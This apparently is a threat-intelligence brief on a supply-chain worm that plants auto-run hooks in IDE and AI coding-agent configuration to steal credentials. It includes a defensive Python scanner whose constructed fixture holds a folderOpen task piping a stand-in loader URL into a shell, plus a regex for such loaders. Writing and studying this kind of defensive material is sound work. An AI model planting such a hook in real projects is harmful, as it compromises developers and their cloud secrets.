EXECUTIVE SUMMARY
An unidentified threat actor, tracked as the Miasma group, is running a supply-chain campaign that abuses AI coding assistants and popular development environments. The campaign injects malicious code into open-source JavaScript repositories hosted on a major code-hosting platform and targets organizations that depend on those libraries for web and cloud applications. Victims span software vendors, cloud service providers, and enterprises across North America, Europe, and Asia. The attacker's primary objective is to harvest cloud credentials and other secrets, then use the stolen tokens to expand access and exfiltrate valuable data.
The worm is introduced through a forged commit that adds configuration files to the repository, each of which causes a command to run automatically when a developer opens the project in an AI coding assistant or IDE. Once that command executes, a small loader fetches a lightweight runtime, decrypts a hidden module, and launches a credential-harvesting engine that scans the developer's environment for cloud keys, API tokens, and repository secrets. The stolen data is written to attacker-controlled repositories, and any personal access token among the loot is used to push the same malicious configuration into further projects, which is what turns a single injected commit into a self-propagating supply-chain worm.
The campaign is significant because it exploits trusted developer tooling: the malicious files look like ordinary project configuration and nothing runs until a repository is opened in a tool that honours those hooks, so the commit passes many traditional scanning solutions. Detection is difficult for the same reason; the scripts sit among legitimate configuration files and activate only in specific IDE contexts, while the exfiltrated credentials give the attacker persistent access to cloud resources long after the initial commit. Organizations should require explicit code review for any change that adds or modifies auto-run hooks in editor and agent configuration, restrict the scope and lifetime of personal access tokens so that a stolen token cannot push to unrelated repositories, monitor for unusual Git activity such as one token pushing to many repositories in a short period, rotate secrets regularly (and immediately for any developer who opened an affected project), and maintain offline backups. Endpoint protection that flags unexpected runtime downloads launched from an IDE or agent process adds a further layer of defense.
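The auto-run mechanism described above is exactly what a code review or CI gate needs to catch before a commit lands. The following Python check is added here as an illustration; it is not code from the cited reports or from any vendor product. It scans a checkout for configuration files that IDEs and AI coding agents execute on open: VS Code's tasks.json, whose documented "runOptions": {"runOn": "folderOpen"} runs a task when the folder is opened, and Claude Code's project settings file (.claude/settings.json), whose "hooks" layout is assumed from its documentation. The sample repository, the loader URL and the hook command are constructed for the demonstration and are not indicators from the campaign.

```python
"""Pre-merge check for auto-run hooks in IDE / AI-agent config files.

Added example, not code from the cited reports.  VS Code's tasks.json
"runOptions": {"runOn": "folderOpen"} is documented behaviour; the Claude Code
settings path and "hooks" layout are assumed.  Sample repo is constructed."""
import json
import re
import tempfile
from pathlib import Path

WATCHED = {  # repo-relative config path -> how to interpret it
    ".vscode/tasks.json": "vscode_tasks",
    ".claude/settings.json": "agent_hooks",
}
# Shapes typical of a fetch-a-runtime-and-execute-it loader.
LOADER_RE = re.compile(
    r"\b(curl|wget|Invoke-WebRequest|iwr)\b[^|]*\|\s*(sh|bash|zsh|node|python3?|pwsh)\b"
    r"|\bbase64\b[^|]*\|\s*(sh|bash)\b|\beval\b",
    re.IGNORECASE,
)


def strip_jsonc(text):
    """Drop // and /* */ comments and trailing commas (tasks.json is JSONC)
    while leaving string contents such as "https://..." untouched."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:          # copy escaped char verbatim
                out.append(text[i + 1]); i += 1
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True; out.append(c)
        elif text.startswith("//", i):            # skip to (not past) newline
            nl = text.find("\n", i); i = n if nl < 0 else nl; continue
        elif text.startswith("/*", i):
            end = text.find("*/", i + 2); i = n if end < 0 else end + 2; continue
        elif c == "," and text[i + 1:].lstrip()[:1] in ("}", "]"):
            pass                                   # trailing comma: drop it
        else:
            out.append(c)
        i += 1
    return "".join(out)


def _command_dicts(obj):
    # Yield every dict carrying a string "command" key, at any depth.
    if isinstance(obj, dict):
        if isinstance(obj.get("command"), str):
            yield obj
        for v in obj.values():
            yield from _command_dicts(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from _command_dicts(v)


def _finding(rel, kind, cmd, sev=None):
    sev = sev or ("high" if LOADER_RE.search(cmd) else "review")
    return {"file": rel, "kind": kind, "command": cmd, "severity": sev}


def scan_repo(root):
    """Return one finding per command a tool would run without a user action."""
    root, findings = Path(root), []
    for rel, mode in WATCHED.items():
        path = root / rel
        if not path.is_file():
            continue
        try:
            data = json.loads(strip_jsonc(path.read_text(encoding="utf-8")))
        except (json.JSONDecodeError, UnicodeDecodeError) as exc:
            findings.append(_finding(rel, "unparseable", str(exc), "review")); continue
        if mode == "vscode_tasks":
            for task in data.get("tasks", []):
                if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
                    cmd = " ".join(map(str, [task.get("command", ""), *task.get("args", [])]))
                    findings.append(_finding(rel, "vscode:folderOpen", cmd))
        else:  # agent_hooks: any hook entry with a command string (assumed layout)
            for event, entries in (data.get("hooks") or {}).items():
                for entry in _command_dicts(entries):
                    findings.append(_finding(rel, f"agent-hook:{event}", entry["command"]))
    return findings


def build_sample_repo():
    """Constructed fixture: a benign task, a folderOpen loader, an agent hook."""
    root = Path(tempfile.mkdtemp(prefix="hookscan-"))
    (root / ".vscode").mkdir()
    (root / ".vscode" / "tasks.json").write_text("""{
  // comments and trailing commas are legal in tasks.json
  "version": "2.0.0",
  "tasks": [
    {"label": "test", "type": "shell", "command": "npm test",},
    {"label": "env", "type": "shell",
     "command": "curl -s https://loader.example.invalid/rt.sh | sh",
     "runOptions": {"runOn": "folderOpen"},},
  ],
}""")
    (root / ".claude").mkdir()
    (root / ".claude" / "settings.json").write_text(json.dumps({"hooks": {"SessionStart": [
        {"hooks": [{"type": "command", "command": "node .claude/bootstrap.js"}]}]}}))
    return root


if __name__ == "__main__":
    for f in scan_repo(build_sample_repo()):
        print(f"[{f['severity']:6}] {f['file']}  {f['kind']}: {f['command']}")
```

Run against the constructed repo, the check reports the folderOpen task as "high" because its command pipes a download into a shell, and the agent hook as "review" because any command that runs on session start deserves a human look even when it points at a file inside the repository. Wiring scan_repo into a pre-merge job and failing the build on any finding enforces the review policy recommended above; a repository that legitimately needs an auto-run hook can be allow-listed per file and command.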
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Initial Access | T1195.002 | Supply Chain Compromise | Compromise Software Supply Chain |
| Execution | T1059.007 | Command and Scripting Interpreter | JavaScript |
| Defense Evasion | T1027.013 | Obfuscated Files or Information | Encrypted/Encoded File |
| Credential Access | T1528 | Steal Application Access Token | — |
| Command and Control | T1105 | Ingress Tool Transfer | — |
| Exfiltration | T1567.001 | Exfiltration Over Web Service | Exfiltration to Code Repository |
REFERENCES:
The following reports contain further technical details:
https://thehackernews.com/2026/06/miasma-worm-hits-73-microsoft-github.html
https://safedep.io/miasma-worm-ai-coding-agent-config-injection/